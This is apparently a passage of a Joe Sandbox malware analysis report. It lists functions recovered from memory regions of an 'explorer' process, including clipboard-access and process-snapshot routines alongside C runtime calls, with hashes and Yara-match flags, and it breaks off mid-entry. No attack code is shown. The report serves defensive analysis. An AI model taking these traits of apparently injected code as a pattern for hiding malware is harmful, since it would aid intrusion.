                                                                                                                                                                                                                        • API String ID: 1861546320-1405518554
                                                                                                                                                                                                                        • Opcode ID: 309c941c9470b4e728e195127d4696c71dc0bec13ae96b4ed8d4dd678429d647
                                                                                                                                                                                                                        • Instruction ID: cac657107a11e0c1a9e7ab5ba26135048bcd4c15db47bb2a7a34f330a8df9149
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 309c941c9470b4e728e195127d4696c71dc0bec13ae96b4ed8d4dd678429d647
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50F04F7221494591CF14FB26E99019DA366FB98B84F844C31960F476A8EFB4CEC6C351
                                                                                                                                                                                                                        Function 0FF4EF80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0FF4EF92
                                                                                                                                                                                                                          • Part of subcall function 0FF5C800: _lock.LIBCMT ref: 0FF5C812
                                                                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0FF4EFD8
                                                                                                                                                                                                                          • Part of subcall function 0FF5CFDC: setlocale.LIBCMT ref: 0FF5CFF0
                                                                                                                                                                                                                          • Part of subcall function 0FF5CFDC: _Yarn.LIBCPMT ref: 0FF5D00A
                                                                                                                                                                                                                          • Part of subcall function 0FF5CFDC: setlocale.LIBCMT ref: 0FF5D019
                                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0FF4EFF7
                                                                                                                                                                                                                        • _CxxThrowException.LIBCMT ref: 0FF4F008
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: setlocalestd::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_ThrowYarn_lockstd::bad_exception::bad_exception
                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                        • API String ID: 1861546320-1405518554
                                                                                                                                                                                                                        • Opcode ID: 309c941c9470b4e728e195127d4696c71dc0bec13ae96b4ed8d4dd678429d647
                                                                                                                                                                                                                        • Instruction ID: 54045ef4ff429d18eaa3047e23e85f6fe4dd6ace2a34046026ecc0e4a23316a2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 309c941c9470b4e728e195127d4696c71dc0bec13ae96b4ed8d4dd678429d647
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28F06262210B4590DB14FF25ED901ADB726FB94BC4F8444319A4F4B969EF2CD946C361
                                                                                                                                                                                                                        Function 0DFCE16C Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2998201375-0
                                                                                                                                                                                                                        • Opcode ID: 6316e364654e228a3c63f6698755658b4f82f4fde50ea094c3cfb14d0de8268f
                                                                                                                                                                                                                        • Instruction ID: 62c64e7393493b8c94a37d273fd7ef914ef627803b61bb7d3b3ce4902ccbca0e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6316e364654e228a3c63f6698755658b4f82f4fde50ea094c3cfb14d0de8268f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D531A232B1578286D7208F19E680779BB65FB85F90F18E12AFF8957B54DB38C4618700
                                                                                                                                                                                                                        Function 0E12E16C Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2998201375-0
                                                                                                                                                                                                                        • Opcode ID: 6316e364654e228a3c63f6698755658b4f82f4fde50ea094c3cfb14d0de8268f
                                                                                                                                                                                                                        • Instruction ID: 39a512296edf7b2ca85b8e9b5dd36fc35725f4894fb03dd5d80394f614c5e35b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6316e364654e228a3c63f6698755658b4f82f4fde50ea094c3cfb14d0de8268f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F231A43221579086D7228F25E99076DBBA5FB85FC0F28413AEB8957B58DB38C8E1C700
                                                                                                                                                                                                                        Function 0FF6E16C Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2998201375-0
                                                                                                                                                                                                                        • Opcode ID: 6316e364654e228a3c63f6698755658b4f82f4fde50ea094c3cfb14d0de8268f
                                                                                                                                                                                                                        • Instruction ID: fed2c027ea50c713a472610e376a4f8c488713ed290a2be84ceb757f611ce2bf
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6316e364654e228a3c63f6698755658b4f82f4fde50ea094c3cfb14d0de8268f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE31C037B1478186DB208F29E580769BB66FB85F84F184226EB889BB5ACF78D4418704
                                                                                                                                                                                                                        Function 0DFBAA00 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3721439000-0
                                                                                                                                                                                                                        • Opcode ID: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction ID: dba26cfe08536617e399aa4e41abd1f8d1ea242f7128adbf2e0f14eba55f9feb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D11A82231868496DA20DB2EE9903FA7365F7C53B4F818221DB9D47798DF7CCA058B10
                                                                                                                                                                                                                        Function 0E11AA00 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3721439000-0
                                                                                                                                                                                                                        • Opcode ID: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction ID: d664556de05dc277657218147686c437a6fed0344922e3b8a243786437dc2159
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F11DA2231978482DE24DB25F5503AAB3A5FBC87A4F904A71DA9D47B98EF3CC945CB40
                                                                                                                                                                                                                        Function 0FF5AA00 Relevance: 7.6, APIs: 5, Instructions: 57processCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Module32$Next$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3721439000-0
                                                                                                                                                                                                                        • Opcode ID: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction ID: af2c1fbe3deadd0270acac3750d2a2690dbb15457b24f4e113e28ec7271294bd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cb0acd4c3ce5a1d775198a19e41be5005f75ea81202f6d34496b1ff0c0fa019
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB11932221478582DE20EB65E9803AAB365FBC5B94F804321DF9E4779AEF3CC5158B00
                                                                                                                                                                                                                        Function 0E1184B0 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                        • Opcode ID: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction ID: e8d72bfcbf1ebd41881b16bc6affebe7ae3eb8c46f8f078c57abd7380c5223fa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB018F71715B8082EE59DF26F99436963A2AB88FC0F185534EE5A07BA4DF3CC8C5C700
                                                                                                                                                                                                                        Function 0FF584B0 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                        • Opcode ID: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction ID: e5393a63b6a52a8ac444db3b7bdbc9e04ed21ae2e414f55a75c0fd26ec2828a1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7f0e950452672c33b53b7a7d6ae0d4df301492d08b3e6fd7bb59d6e7e239ab6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF012C22B15B4282EE699F16B984379A361AF88FD0F485138DE5B07B55DF3CE096D700
                                                                                                                                                                                                                        Function 0DEEDA19 Relevance: 7.5, APIs: 5, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3003190580-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: 6f83b9fd174b7d68d54f8bf3cf50e0c67aed4201c37d2f6b7d39ca21b656238f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45F0543021CD0A8FD765FF9DC4C0A7972A0FB4C250B8665A99B4CD7105CE20D5918755
                                                                                                                                                                                                                        Function 0823DA19 Relevance: 7.5, APIs: 5, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3003190580-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: 7b022526d96069ce91de02df67151b7cb945a0c26eb47bff3757c6cb520442ec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DF08974238919CFC79CFB9CC1D0A6873A1FB4C212F4515A9D94DC7306C930A4D28761
                                                                                                                                                                                                                        Function 0E09DA19 Relevance: 7.5, APIs: 5, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3003190580-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: 6e4c017c9a245da40c884e09bf903b97976d7b2ea693450cffc005cb77ee456a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5BF0543021890D8FCBA4FFDCD0D4AA862D0FB5C210B8D09A99608CB115C9309CA19751
                                                                                                                                                                                                                        Function 0DFBE0E4 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFBE0F1
                                                                                                                                                                                                                          • Part of subcall function 0DFC289C: _getptd_noexit.LIBCMT ref: 0DFC28A2
                                                                                                                                                                                                                          • Part of subcall function 0DFC289C: _amsg_exit.LIBCMT ref: 0DFC28B2
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0DFBE0FF
                                                                                                                                                                                                                          • Part of subcall function 0DFC50A0: DecodePointer.KERNEL32 ref: 0DFC50AB
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFBE104
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0DFBE120
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0DFBE130
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3669027769-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: f7e21ee678c3e375370c0ed27db2e1c08ada88521b0c661fe0f02b330fdde24f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1E06533618682E1CA21BB5EE6801FD7364E74CB90F5DF43AEB4407309DE20D8A08355
                                                                                                                                                                                                                        Function 0E11E0E4 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E11E0F1
                                                                                                                                                                                                                          • Part of subcall function 0E12289C: _getptd_noexit.LIBCMT ref: 0E1228A2
                                                                                                                                                                                                                          • Part of subcall function 0E12289C: _amsg_exit.LIBCMT ref: 0E1228B2
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0E11E0FF
                                                                                                                                                                                                                          • Part of subcall function 0E1250A0: DecodePointer.KERNEL32 ref: 0E1250AB
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E11E104
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0E11E120
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E11E130
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3669027769-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: e27d6c4d98f785313e8dc8bf419aba03b9bca908b47b3f1d7c481951b24d27f6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04E03932315680C1CA15ABE2E8905BD63E1EB8CB80F9D89B9CF450B309DF20CCE0C356
                                                                                                                                                                                                                        Function 0FF5E0E4 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF5E0F1
                                                                                                                                                                                                                          • Part of subcall function 0FF6289C: _getptd_noexit.LIBCMT ref: 0FF628A2
                                                                                                                                                                                                                          • Part of subcall function 0FF6289C: _amsg_exit.LIBCMT ref: 0FF628B2
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0FF5E0FF
                                                                                                                                                                                                                          • Part of subcall function 0FF650A0: DecodePointer.KERNEL32 ref: 0FF650AB
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF5E104
                                                                                                                                                                                                                        • _inconsistency.LIBCMT ref: 0FF5E120
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF5E130
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3669027769-0
                                                                                                                                                                                                                        • Opcode ID: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction ID: c2b763d771e1a2505cce4a9a20b627a5b6ca193bf27ae68d3f8521cabe0e7ed1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c579297932cc361c8c26e2a05b27a0c9941063667d480475ede27e4e7f48b6f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEE03933A14681D1CF156BB5E9801AD7361EB8CF80F8C8532CF840B207DE28D5908355
                                                                                                                                                                                                                        Function 0DEFA361 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEFA37A
                                                                                                                                                                                                                          • Part of subcall function 0DEEF0F5: _getptd_noexit.LIBCMT ref: 0DEEF0F9
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DEFA386
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEFA3AD
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno$_getptd_noexit_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID: 1
                                                                                                                                                                                                                        • API String ID: 28428206-2212294583
                                                                                                                                                                                                                        • Opcode ID: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction ID: 1d8b0c00847554e6f2f0990aba6e0be5d7cd7c8beaadd5a90b8e18b3dab03c0d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9d95dec9c3dea56ffd5fce2e13d6af285bedd21f2ba0e29e4b36af891e3c234
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3521DA1062DEC98EE31B673C488433D3AD9FB5B149F1960F9878ACF156DD65C8428311
                                                                                                                                                                                                                        Function 0824A361 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0824A37A
                                                                                                                                                                                                                          • Part of subcall function 0823F0F5: _getptd_noexit.LIBCMT ref: 0823F0F9
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0824A386
